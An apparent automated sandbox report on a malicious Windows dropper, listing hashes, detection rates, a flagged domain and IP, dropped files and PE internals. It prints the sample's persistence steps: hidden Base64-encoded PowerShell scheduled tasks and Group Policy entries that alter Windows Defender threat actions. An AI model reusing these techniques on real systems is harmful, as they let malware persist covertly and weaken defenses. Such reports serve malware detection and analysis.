19:15:14 | Task Scheduler | Run new task: gbyyEslRl path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
19:15:35 | Task Scheduler | Run new task: bbsSMGQQDZvgelOgpL path: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe s>DC /site_id 525403 /S
19:16:48 | Task Scheduler | Run new task: gwDFsvbzF path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
19:17:03 | Task Scheduler | Run new task: agQaaMVMfgqpSGSbr path: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe s>mY /site_id 525403 /S
19:17:08 | Task Scheduler | Run new task: AxVCmvJfwAUUq2 path: C:\Windows\system32\wscript.exe s>"C:\ProgramData\wizgoPrNSfGOJXVB\oJRrLYd.wsf"

                  No context
Match | Associated Sample Name / URL | Detection | Context
service-domain.xyz | file.exe | malicious | 3.80.150.121
Match / Associated Sample Name / Detection
C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe
• Filename: file.exe, Detection: malicious
C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.9260988789684415
                                        Encrypted:false
                                        SSDEEP:3:Nlllulb/lj:NllUb/l
                                        MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                        SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                        SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                        SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                        Malicious:false
                                        Preview:@...e................................................@..........
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):6571809
                                        Entropy (8bit):7.996003603865134
                                        Encrypted:true
                                        SSDEEP:196608:91OAmLWOhmdNwFc7/hpQd4CYYlW7bWzg+aNxKpzDkp5x4WM:3OvWOkz3Qd4joeYSxKpzDo5x4WM
                                        MD5:65D01849A2062434BCE6C580CDA92A1D
                                        SHA1:8BEF36557E25532961724539E4DDBB4D11970627
                                        SHA-256:8B691E37EECDDAACD1BB83067CE261157895DEC8302E558C5C9D159C117151A4
                                        SHA-512:0EECF3824418C210DB4257EA5F2852BB32B02C5B3CE0FE62F841F71E10EC81482D889880EE42438B3EF2DC39682BDA2CD9435DD08CF21879D92148A9C7591EBE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 41%
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):866146
                                        Entropy (8bit):7.999783652399914
                                        Encrypted:true
                                        SSDEEP:24576:4YGhUN5iugAVdfj07IcTW6rIwX2N8m/ZQq2fd7w+IxulInxM:4YGhPufVdfjgIUWmIwX2N8SKPd86UM
                                        MD5:927A00BC73AD358930C1BCA86D1F78AE
                                        SHA1:AAED44842119FF3287961E29E9A7CE38B5C92DC3
                                        SHA-256:526184BCF9AB17BEF2C67600F9D8E7E7CE4DDC4D4241BECC5F724E832AFB538D
                                        SHA-512:E952277890D0E02B56836BFCE7BC9427CF8616D06E4EBDE2F07EAE9899E7CD837BEADD93D6919627492B44EF91E7F2E08F37597840B2801AEA5313423CEF7932
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):7104512
                                        Entropy (8bit):7.680459343919421
                                        Encrypted:false
                                        SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                                        MD5:893793FBD70BA4A92919D09205D6C9C1
                                        SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                                        SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                                        SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 51%
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):7104512
                                        Entropy (8bit):7.680459343919421
                                        Encrypted:false
                                        SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                                        MD5:893793FBD70BA4A92919D09205D6C9C1
                                        SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                                        SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                                        SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 51%
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12144
                                        Entropy (8bit):5.377046628185695
                                        Encrypted:false
                                        SSDEEP:192:VtH+avFi5nkbYh/Gb2keE2DAsb+EBOYSVFEJ+aNK1e+9kN8rI:VteMKnkbrb50915SVS2rI
                                        MD5:FE9620200B9EB3960270D352AFBE2CD7
                                        SHA1:9FC7320FF2949D0552C0E191A5F285A3BBEB663D
                                        SHA-256:8BD03B4334DBB86A806D029833321B7A39D587678403C6297371086CE9C12D7C
                                        SHA-512:E95E8F98B5490DD6A68828054138D12ABF2BBD38399CF25CA2BE4AA1F687F1FD6E943A729B3E89FB0F9B4E5288B8F193C783171F9254945DE78889672A3C8EE0
                                        Malicious:false
                                        Preview:@...e...........................................................H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration............................................T.@..>@...@.V.@.H.@.X.@.[.@.NT@.HT@..S@..S@.hT@..S@..S@..S@.\.@..T@..T@.@X@.?X@..T@..S@..S@..T@..T@.
                                        Process:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe
                                        File Type:RAGE Package Format (RPF),
                                        Category:dropped
                                        Size (bytes):4486
                                        Entropy (8bit):3.5339576290192576
                                        Encrypted:false
                                        SSDEEP:96:W9H9h9j9n9a9K9o92939l9S9nyJ0R0yi0A0L0e0R0G0w8:N
                                        MD5:D4FADEF490BFB3525A04D9552210611E
                                        SHA1:EC434E4EE2ED3077A2467840325F598518C9B6DF
                                        SHA-256:8E60A72948AF47830E2603912A98EF534C4DAD9D5EFEF105321B50EE4B99B9E3
                                        SHA-512:48FA3F3E55DCD1E73724D6DBD6C0100096F32FABBF2AA3C68786A8F0F5B223C8137EBCF99D3C102BDA8B393C4BAFD5BBFD43940FFC0A601E12536C9B4B19D906
                                        Malicious:false
                                        Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s...;.T.h.r.e.a.t.s._.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.2.5.4.5.1...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.5.6.5.9.6...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.4.2.8.7.2...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.1.4.7.7.4.9.3.7.3...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.
                                        Process:C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):268
                                        Entropy (8bit):4.9507895998010145
                                        Encrypted:false
                                        SSDEEP:6:1QnMzYHxbnPonn3dXsMzYHxbnn/JIAuNhUHdhJg+5Rnn3dzC:1QM0HxbnIV0Hxbn/JnumuuzC
                                        MD5:A62CE44A33F1C05FC2D340EA0CA118A4
                                        SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
                                        SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
                                        SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
                                        Malicious:true
                                        Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.
                                        Process:C:\Windows\SysWOW64\schtasks.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):526
                                        Entropy (8bit):3.684926359710003
                                        Encrypted:false
                                        SSDEEP:12:2gdCXO3qQ1zKvkutlbKMiTM5S3qQ1zKvkuwFhwVJ:Xd/L5vsKNL5vx
                                        MD5:3D1ACFB3B776CECD896559D840823F0E
                                        SHA1:5D0D68CBA95291B53860D613BCC7342FDEA1A557
                                        SHA-256:3CD11F87DDB03E7BDD95EC0DCC9D612F7D6D399A3136788D6927960D752E2FCB
                                        SHA-512:3D0EC87EC5B8D2B400AB3473C417A17AB682710690BDDA316521C827C9FD9DDCBFC13C2E9152B0A41E76CCE469B58D4C259D9BAB088F164DA22177475831C344
                                        Malicious:false
                                        Preview:....J..X.0.L.....dw[F.......<... .....s...............................P.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.X.A.f.c.x.y.Y.i.T.Q.K.M.O.E.R.w.\.e.f.p.l.S.H.r.L.k.K.v.i.a.S.K.\.p.d.y.D.o.I.J...e.x.e.....D.C. ./.s.i.t.e._.i.d. .5.2.5.4.0.3. ./.S...D.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.X.A.f.c.x.y.Y.i.T.Q.K.M.O.E.R.w.\.e.f.p.l.S.H.r.L.k.K.v.i.a.S.K.....D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.h.a.r.d.z...................0...............................................
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):7104512
                                        Entropy (8bit):7.680459343919421
                                        Encrypted:false
                                        SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                                        MD5:893793FBD70BA4A92919D09205D6C9C1
                                        SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                                        SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                                        SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 51%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\gpupdate.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):129
                                        Entropy (8bit):4.366220328806915
                                        Encrypted:false
                                        SSDEEP:3:gBgvKCGPE3UkEmdOO2AGN8cwwHBkEmdOO2AGN8cwow:guSFMEkErONGN83YkErONGN837
                                        MD5:EF6D648C3DA0518B784D661B0C0B1D3D
                                        SHA1:C5C5F6E4AD6C3FD8BE4313E1A7C2AF2CAA3184AD
                                        SHA-256:18C16D43EB823C1BC78797991D6BA2898ACA8EB2DE5FD6946BE880F7C6FBBEF5
                                        SHA-512:E1E0443CA2E0BAFAC7CBBFD36D917D751AC6BE2F3F16D0B67B43EEBD47D6A7C36F12423AFA95B6BF56E5AAD155675C3307EFC6E94F0808EB72EF27B093EADD67
                                        Malicious:false
                                        Preview:Updating policy.........Computer Policy update has completed successfully....User Policy update has completed successfully.......
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.996908423754259
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:7604002
                                        MD5:e99e15a440798e20c682eb859b3f7885
                                        SHA1:b6f3b87894f51669dede0afe6cb4b504fe0ae614
                                        SHA256:c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
                                        SHA512:6cbbae34ab571522545be0c27e1f13cf0d8545f8ba69c3d343b3ac1c1f113b7dbe6e3ce26a3897a1197bc0b57378165ab8145c29332b99d83e50b87c513e7d5e
                                        SSDEEP:196608:91OcMHdXjgqBmVcMymSmuw3lIk3+C83fqpI/jdyNVaZ4g:3OcuF9m51T1Iku93f8wd8Rg
                                        TLSH:6276333174C19CF2DE173231A28D2AE175F6EDD84D636A3717428A3A297D24AC3B1E53
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y...s...,...s...r.!.s.......s...x...s.......s.......s.^.u...s.Rich..s.........PE..L....S.L...........
                                        Icon Hash:8484d4f2b8f47434
                                        Entrypoint:0x414b04
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:
                                        Time Stamp:0x4CE553F7 [Thu Nov 18 16:27:35 2010 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:3786a4cf8bfee8b4821db03449141df4
                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        push FFFFFFFFh
                                        push 0041B9E0h
                                        push 00414A2Ch
                                        mov eax, dword ptr fs:[00000000h]
                                        push eax
                                        mov dword ptr fs:[00000000h], esp
                                        sub esp, 58h
                                        push ebx
                                        push esi
                                        push edi
                                        mov dword ptr [ebp-18h], esp
                                        call dword ptr [0041B074h]
                                        xor edx, edx
                                        mov dl, ah
                                        mov dword ptr [004233D0h], edx
                                        mov ecx, eax
                                        and ecx, 000000FFh
                                        mov dword ptr [004233CCh], ecx
                                        shl ecx, 08h
                                        add ecx, edx
                                        mov dword ptr [004233C8h], ecx
                                        shr eax, 10h
                                        mov dword ptr [004233C4h], eax
                                        push 00000001h
                                        call 00007EFF5068258Bh
                                        pop ecx
                                        test eax, eax
                                        jne 00007EFF506816FAh
                                        push 0000001Ch
                                        call 00007EFF506817B8h
                                        pop ecx
                                        call 00007EFF5068203Dh
                                        test eax, eax
                                        jne 00007EFF506816FAh
                                        push 00000010h
                                        call 00007EFF506817A7h
                                        pop ecx
                                        xor esi, esi
                                        mov dword ptr [ebp-04h], esi
                                        call 00007EFF506841ACh
                                        call dword ptr [0041B078h]
                                        mov dword ptr [00425A3Ch], eax
                                        call 00007EFF5068406Ah
                                        mov dword ptr [00423340h], eax
                                        call 00007EFF50683E13h
                                        call 00007EFF50683D55h
                                        call 00007EFF506837B0h
                                        mov dword ptr [ebp-30h], esi
                                        lea eax, dword ptr [ebp-5Ch]
                                        push eax
                                        call dword ptr [0041B07Ch]
                                        call 00007EFF50683CE6h
                                        mov dword ptr [ebp-64h], eax
                                        test byte ptr [ebp-30h], 00000001h
                                        je 00007EFF506816F8h
                                        movzx eax, word ptr [ebp+00h]
                                        Programming Language:
                                        • [ C ] VS98 (6.0) SP6 build 8804
                                        • [C++] VS98 (6.0) SP6 build 8804
                                        • [ C ] VS2010 build 30319
                                        • [ASM] VS2010 build 30319
                                        • [EXP] VC++ 6.0 SP5 build 8804

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1e9e4 | 0x64 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x27000 | 0xa60 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x1b000 | 0x1f8 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x1000 | 0x199ea | 0x19a00 | False | 0.5822884908536585 | DOS executable (COM) | 6.608494417524647 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata | 0x1b000 | 0x4494 | 0x4600 | False | 0.31166294642857145 | data | 4.368016436198423 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data | 0x20000 | 0x5a48 | 0x3200 | False | 0.122890625 | data | 1.370539432871311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .sxdata | 0x26000 | 0x4 | 0x200 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc | 0x27000 | 0xa60 | 0xc00 | False | 0.3388671875 | data | 3.3019646948427273 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Name | RVA | Size | Type | Language | Country
                                        RT_ICON | 0x274a0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States
                                        RT_ICON | 0x27788 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States
                                        RT_DIALOG | 0x278d8 | 0xb8 | data | English | United States
                                        RT_STRING | 0x27990 | 0x94 | data | English | United States
                                        RT_STRING | 0x27a28 | 0x34 | data | English | United States
                                        RT_GROUP_ICON | 0x278b0 | 0x22 | data | English | United States
                                        RT_VERSION | 0x271e0 | 0x2bc | data | English | United States

                                        DLL | Import
                                        OLEAUT32.dll | VariantClear, SysAllocString
                                        USER32.dll | SendMessageA, SetTimer, DialogBoxParamW, DialogBoxParamA, SetWindowLongA, GetWindowLongA, SetWindowTextW, LoadIconA, LoadStringW, LoadStringA, CharUpperW, CharUpperA, DestroyWindow, EndDialog, PostMessageA, ShowWindow, MessageBoxW, GetDlgItem, KillTimer, SetWindowTextA
                                        SHELL32.dll | ShellExecuteExA
                                        KERNEL32.dll | GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InterlockedIncrement, InterlockedDecrement, GetProcAddress, GetOEMCP, GetACP, GetCPInfo, IsBadCodePtr, IsBadReadPtr, GetFileType, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, HeapSize, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapCreate, HeapDestroy, GetEnvironmentVariableA, SetUnhandledExceptionFilter, TlsAlloc, ExitProcess, GetVersion, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, WaitForSingleObject, CloseHandle, CreateProcessA, SetCurrentDirectoryA, GetCommandLineW, GetVersionExA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetLastError, LoadLibraryA, AreFileApisANSI, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetWindowsDirectoryA, SetFileTime, CreateFileW, SetLastError, SetFileAttributesA, RemoveDirectoryA, SetFileAttributesW, RemoveDirectoryW, CreateDirectoryA, CreateDirectoryW, DeleteFileA, DeleteFileW, lstrlenA, GetFullPathNameA, GetFullPathNameW, GetCurrentDirectoryA, GetTempPathA, GetTempFileNameA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, ReadFile, WriteFile, SetEndOfFile, GetStdHandle, WaitForMultipleObjects, Sleep, VirtualAlloc, VirtualFree, CreateEventA, SetEvent, ResetEvent, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, GetCurrentThreadId, TlsSetValue, TlsGetValue, ExitThread

                                        Language of compilation system | Country where language is spoken
                                        English | United States

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Nov 24, 2022 19:16:15.101864100 CET | 52387 | 53 | 192.168.2.3 | 8.8.8.8
                                        Nov 24, 2022 19:16:15.119308949 CET | 53 | 52387 | 8.8.8.8 | 192.168.2.3
                                        Nov 24, 2022 19:16:15.974688053 CET | 56924 | 53 | 192.168.2.3 | 8.8.8.8
